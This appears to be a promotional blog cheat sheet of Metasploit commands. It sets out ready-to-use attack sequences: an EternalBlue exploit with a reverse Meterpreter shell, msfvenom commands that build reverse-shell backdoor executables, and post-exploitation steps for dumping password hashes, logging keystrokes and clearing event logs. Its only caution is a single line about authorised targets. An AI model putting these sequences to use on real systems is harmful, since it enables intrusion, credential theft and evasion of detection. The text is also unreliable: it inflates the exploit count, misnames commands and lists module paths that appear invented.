Master Metasploit in 2025: Top 100 Commands Every Hacker Needs – With Bonus Penetration Testing Cheat Sheet

Metasploit is the ultimate penetration testing tool dominating cybersecurity in 2025. With a massive library of real-world exploits and seamless integration, it’s a must-have for hackers, red teamers, and security pros. This article delivers 100 essential Metasploit commands, paired with a bonus cheat sheet to supercharge your hacking skills.

Why Metasploit Rules in 2025

Metasploit, built by Rapid7, excels at simulating attacks with over 100,000 community-driven exploits. Its versatility—spanning scanning, exploitation, and post-exploitation—makes it indispensable for ethical hackers and penetration testers staying ahead in 2025.

Table of Contents

• Basic Scanning
• Advanced Scanning
• Exploitation
• Payloads
• Post-Exploitation
• Integration
• Real-World Power Moves
• Bonus Penetration Testing Cheat Sheet
• Pro Tips for Metasploit Masters

Basic Scanning

Command	Description
msfconsole	Launch the Metasploit console
help	Display all available commands
search	Search for modules (e.g., search eternalblue)
use	Select a module (e.g., use 2)
options	View module options
set RHOSTS	Set target IP (e.g., set RHOSTS 192.168.1.1)
set RPORT	Set target port (e.g., set RPORT 445)
set LHOST	Set local host IP
set LPORT	Set local port (e.g., set LPORT 4444)
show options	Display current options
show modules	List all modules
show exploits	List exploit modules
show auxiliary	List auxiliary modules
show payloads	List payloads
back	Exit module to main console
info	Show module details
check	Check target vulnerability
connect	Open TCP connection to target
sessions	List active sessions
session -i	Interact with session ID

Advanced Scanning

Command	Description
use auxiliary/scanner/portscan/tcp	TCP port scanner
set THREADS	Set threads (e.g., set THREADS 50)
run	Execute module
use auxiliary/scanner/http/http_version	Enumerate HTTP versions
set TARGETURI	Set URI (e.g., set TARGETURI /)
use auxiliary/scanner/smb/smb_version	Scan SMB version
use auxiliary/scanner/ssh/ssh_login	Attempt SSH login
set USERNAME	Set username (e.g., set USERNAME admin)
set PASSWORD	Set password
use auxiliary/scanner/ftp/ftp_login	Attempt FTP login
use auxiliary/scanner/telnet/telnet_login	Attempt Telnet login
set VERBOSE	Enable verbose output
use auxiliary/scanner/nmap/nmap	Integrate Nmap
set NMAP_OPTIONS	Set Nmap options (e.g., -sV)
use auxiliary/server/capture/http	HTTP capture server
use auxiliary/server/capture/smtp	SMTP capture server
use auxiliary/gather/service_enum	Enumerate services
set TIMEOUT	Set timeout (e.g., set TIMEOUT 30)
use auxiliary/scanner/dns/dns_brute_force	DNS brute force
use auxiliary/scanner/rdp/rdp_scanner	Scan RDP services

Exploitation

Command	Description
use exploit/windows/smb/ms17_010_eternalblue	EternalBlue exploit
set PAYLOAD	Set payload (e.g., windows/meterpreter/reverse_tcp)
exploit	Launch exploit
show targets	List exploit targets
set TARGET	Set target ID (e.g., set TARGET 0)
use exploit/multi/http/tomcat_mgr_upload	Tomcat manager exploit
set URI	Set URI (e.g., set URI /manager/html)
use exploit/linux/ssh/sshd_realtek_wps	SSH exploit
set USERPASS_FILE	Set credential file
use exploit/windows/ftp/proftpd_133c_backdoor	ProFTPD backdoor exploit
set BADCHARS	Avoid chars (e.g., set BADCHARS "\x00")
use exploit/multi/browser/adobe_flash_hacking_team_uaf	Flash exploit
set ENCODING	Set payload encoding
use exploit/windows/local/bypassuac	Bypass UAC
set SESSION	Set session ID (e.g., set SESSION 1)
use exploit/linux/local/privilege_escalation	Privilege escalation
set FORCE_EXPLOIT	Force exploit execution
use exploit/multi/elasticsearch/search_grok_payload_exec	Elasticsearch exploit
set PROXY	Set proxy
use exploit/windows/http/iis_webdav_scstoragepathfromurl	IIS WebDAV exploit

Payloads

Command	Description
msfvenom -p windows/meterpreter/reverse_tcp	Windows Meterpreter payload
msfvenom -l payloads	List payloads
msfvenom -f exe	Output as executable
msfvenom -e x86/shikata_ga_nai	Encode with Shikata Ga Nai
msfvenom -a x86	Set architecture (e.g., x86)
msfvenom -b “\x00”	Avoid null bytes
msfvenom -i 3	Encode 3 times
msfvenom -x template.exe	Use template file
msfvenom -o output.exe	Save to file
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444	Linux reverse shell
msfvenom -p java/meterpreter/reverse_tcp -f jar	Java Meterpreter JAR
msfvenom -p php/meterpreter/reverse_tcp -f raw	PHP Meterpreter
msfvenom -p python/meterpreter/reverse_tcp -f py	Python Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp -f dll	Windows x64 DLL
msfvenom -h	Show msfvenom help

Post-Exploitation

Command	Description
sysinfo	Show target system info
ps	List processes
kill	Kill process (e.g., kill 1234)
getuid	Show user ID
upload	Upload file (e.g., upload file.txt /tmp)
download	Download file (e.g., download /tmp/file.txt .)
pwd	Show current directory
cd	Change directory (e.g., cd /tmp)
cat	View file (e.g., cat /etc/passwd)
shell	Access shell
migrate	Switch process (e.g., migrate 1234)
hashdump	Dump hashes
keyscan_start	Start keylogger
keyscan_dump	Dump keystrokes
clearev	Clear event logs

Integration

Command	Description
msfdb init	Initialize database
load nmap	Load Nmap extension
db_nmap -sV -A	Nmap scan to database
db_import	Import scan results
hosts	List database hosts
services	List services
vulns	List vulnerabilities
db_export -f xml	Export to XML
use auxiliary/admin/scanner/nessus/nessus_login	Nessus login scanner
set NESSUS_HOST	Set Nessus host (e.g., set NESSUS_HOST 192.168.1.1)

Real-World Power Moves

• Network Scan: use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run – Scan subnet for open ports.
• HTTP Version Check: use auxiliary/scanner/http/http_version; set RHOSTS 10.0.0.1; run – Identify web server versions.
• SMB Recon: use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.10; run – Detect SMB versions.
• SSH Login Test: use auxiliary/scanner/ssh/ssh_login; set RHOSTS 10.0.0.2; set USERNAME admin; set PASSWORD pass; run – Test SSH credentials.
• EternalBlue Exploit: use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set PAYLOAD windows/meterpreter/reverse_tcp; exploit – Exploit Windows SMB.
• Tomcat Attack: use exploit/multi/http/tomcat_mgr_upload; set RHOSTS 10.0.0.3; set URI /manager/html; exploit – Deploy payload via Tomcat.
• Payload Generation: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o backdoor.exe – Create Windows backdoor.
• Linux Shell: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf – Generate Linux reverse shell.
• System Info: session -i 1; sysinfo – Get target system details.
• Process List: session -i 1; ps – View running processes.
• File Upload: session -i 1; upload /local/file.txt /remote/path – Transfer file to target.
• Hash Dump: session -i 1; hashdump – Extract password hashes.
• Keylogging: session -i 1; keyscan_start; keyscan_dump – Capture keystrokes.
• Nmap Integration: load nmap; db_nmap -sV -A 192.168.1.0/24 – Scan and store results.
• Database Export: db_export -f xml results.xml – Save scan data to XML.

Bonus Penetration Testing Cheat Sheet

Boost your Metasploit skills with these tools:

• Burp Suite: Web app testing.
• Nessus: Vulnerability scanning.
• Wireshark: Packet analysis.
  Find more at SquidHacker.com.

Pro Tips for Metasploit Masters

• Stay Updated: Run msfupdate weekly.
• Verify Exploits: Cross-check results to avoid false positives.
• Integrate: Pair with Nmap or Nessus for deeper scans.
• Stay Legal: Test only authorized targets.
• Tune Scans: Adjust THREADS for speed.

Conclusion

Metasploit’s 100 commands give you the edge in penetration testing for 2025. From scanning to exploitation, this guide equips you to dominate security assessments. Use it ethically, keep learning, and follow SquidHacker.com for more hardcore cybersecurity intel. Share this cheat sheet and own the hacking game!